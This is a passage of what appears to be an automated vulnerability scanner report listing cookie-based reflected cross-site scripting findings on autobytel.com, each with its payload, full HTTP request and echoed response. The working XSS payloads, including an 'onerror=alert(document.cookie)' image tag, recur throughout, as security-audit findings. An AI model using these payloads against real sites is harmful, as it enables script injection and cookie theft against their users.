           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47F7A716-96F9-BACC-313F2250
...[SNIP]...

4.2047. http://www.autobytel.com/content/home/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bb2e"%3balert(1)//5a9a12890a1 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 6bb2e";alert(1)//5a9a12890a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=6bb2e"%3balert(1)//5a9a12890a1; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:43:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:43:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:43:50 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70726


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
               s.prop8 = "home|lsuv";
           
           //s.prop9 = "home|Search Engine Optimization Project|13148";
           s.prop10 = "home|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "6bb2e";alert(1)//5a9a12890a1||";
           
           s.prop14 = "home : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "home||||||Search Engine Op
...[SNIP]...

4.2048. http://www.autobytel.com/content/home/index.cfm [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload f9c2d<img%20src%3da%20onerror%3dalert(1)>7f9bbd4f348 was submitted in the PV_CT cookie. This input was echoed as f9c2d<img src=a onerror=alert(1)>7f9bbd4f348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2f9c2d<img%20src%3da%20onerror%3dalert(1)>7f9bbd4f348; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 78438
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:41:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:02 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2f9c2d<img src=a onerror=alert(1)>7f9bbd4f348 cannot be converted to a number.
</h1>
...[SNIP]...

4.2049. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2510"%3balert(1)//bdab59c776c was submitted in the BDATALIST cookie. This input was echoed as c2510";alert(1)//bdab59c776c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4c2510"%3balert(1)//bdab59c776c; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:40:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:40:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:40:51 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:40:51 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75090


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4c2510";alert(1)//bdab59c776c";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48003FB1-A3C6-ED4C-22F1F263
...[SNIP]...

4.2050. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c9e2"%3balert(1)//ac77fd474aa was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 4c9e2";alert(1)//ac77fd474aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=4c9e2"%3balert(1)//ac77fd474aa; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:21:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:21:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:21:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:21:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75090


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB421 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "4c9e2";alert(1)//ac77fd474aa||";
           
           s.prop14 = "research|reviews|addctdstep1 : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||
...[SNIP]...

4.2051. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 1d4b6<img%20src%3da%20onerror%3dalert(1)>cd22f64f11e was submitted in the PV_CT cookie. This input was echoed as 1d4b6<img src=a onerror=alert(1)>cd22f64f11e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=21d4b6<img%20src%3da%20onerror%3dalert(1)>cd22f64f11e; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 82831
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:56:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:29 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:28 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 21d4b6<img src=a onerror=alert(1)>cd22f64f11e cannot be converted to a number.
</h1>
...[SNIP]...

4.2052. http://www.autobytel.com/content/research/article/index.cfm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cff9f"%3balert(1)//537a25459db was submitted in the BDATALIST cookie. This input was echoed as cff9f";alert(1)//537a25459db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4cff9f"%3balert(1)//537a25459db; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4cff9f";alert(1)//537a25459db";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "477D7168-AD70-1C3A-5872C03B
...[SNIP]...

4.2053. http://www.autobytel.com/content/research/article/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ccd4"%3balert(1)//5bf50f7c259 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 3ccd4";alert(1)//5bf50f7c259 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=3ccd4"%3balert(1)//5bf50f7c259; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:35:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:19 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:19 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "3ccd4";alert(1)//5bf50f7c259||";
           
           s.prop14 = "research|article : Search Engine Optimization Project entry page";
           s.prop15 = "8893|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||sky|ban|
...[SNIP]...

4.2054. http://www.autobytel.com/content/research/article/index.cfm [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 5e58b<img%20src%3da%20onerror%3dalert(1)>c3ba64603ac was submitted in the PV_CT cookie. This input was echoed as 5e58b<img src=a onerror=alert(1)>c3ba64603ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=25e58b<img%20src%3da%20onerror%3dalert(1)>c3ba64603ac; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 50515
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:31:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:19 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:19 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:19 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 25e58b<img src=a onerror=alert(1)>c3ba64603ac cannot be converted to a number.
</h1>
...[SNIP]...

4.2055. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 605fd"%3balert(1)//420924e9679 was submitted in the BDATALIST cookie. This input was echoed as 605fd";alert(1)//420924e9679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4605fd"%3balert(1)//420924e9679; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:12 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:12 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4605fd";alert(1)//420924e9679";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "477B6AC8-0CB9-E79B-1D936E4D
...[SNIP]...

4.2056. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60be7"%3balert(1)//28645459fda was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 60be7";alert(1)//28645459fda in the application's response.

